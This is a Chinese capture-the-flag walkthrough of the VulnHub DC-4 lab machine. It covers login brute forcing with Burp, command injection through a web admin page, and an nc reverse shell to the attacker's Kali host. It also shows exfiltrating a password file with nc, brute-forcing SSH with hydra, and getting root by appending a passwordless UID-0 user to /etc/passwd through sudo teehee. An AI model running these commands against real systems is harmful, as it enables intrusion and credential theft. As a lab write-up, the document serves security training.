- 详情介绍请参考下载地址任务目标：拿下系统的root账户

  - 靶机下载地址：https://www.vulnhub.com/entry/dc-4,313/

主机信息

DC4：192.168.75.151

Kali：192.168.75.150

实验过程

先发现内网存活主机

arp-scan --interface eth0 192.168.75.1/24

然后查看靶机开放的端口

nmap -A -p- -T4 -v 192.168.75.151

访问80，是一个登录页面

既然遇到登录页面，那就可以尝试看看，是否有弱口令

通过Bp爆破

用户名：admin密码：happy

登进后台

毫无疑问，肯定点击“Command”，发现可以执行一些命令

通过Bp抓取数据包并修改命令，发现修改后的命令可以执行

这里我直接反弹Shell

nc -e /bin/bash 192.168.75.150 8888

shell建立成功升级为交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

cd /home

发现三个账号的家：charles、jim、sam

最终在jim的家中发现了一个老密码的文件

  将这些密码保存下来并对jim进行ssh爆破，因为在信息搜集阶段我们可以看到靶机是开放了22端口

这里可以用nc进行文件传输

# Kalinc -nvlp 5555 > old-passwords.txt# DC4nc 192.168.75.150 5555 < /home/jim/backups/old-passwords.bak

现在用hydra对jim账号进行SSH爆破

hydra  -l jim -P /root/old-passwords.txt ssh://192.168.75.151

通过ssh连接到靶机，执行如下命令：

登入提示：You have mail.

找到了一封root写给jim的邮件

去/var/mail再看看有没有其他有意思的信息，找到了一封charles写给jim的邮件，并且看到了charles的账户密码

这封邮件来得非常妙，是charles写给jim的。因为charles要出去度假了，所以老板叫charles把自己的密码^xHhA&hvim0y给jim。So直接用邮箱传递密码是非常不安全的。

那么我们切换到charles

首先发现jim不能使用sudo权限，难怪靶机还给了我们charles的账户，发现charles可以使用/usr/bin/teehee，并且不需要使用root密码

可以看到使用teehee提权,teehee就是tee的变体从标准输入读取并写入标准输出和文件

我们可以借助teehee往passwd写入一个root账号即可得到root权限

查看一下这个命令的帮助手册，使用-a参数在/etc/passwd文件里面新建一个有管理员权限的用户

首先来了解一下/etc/passwd的格式

echo "NoCirc1e::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

切换用户即可提权成功，并读取flag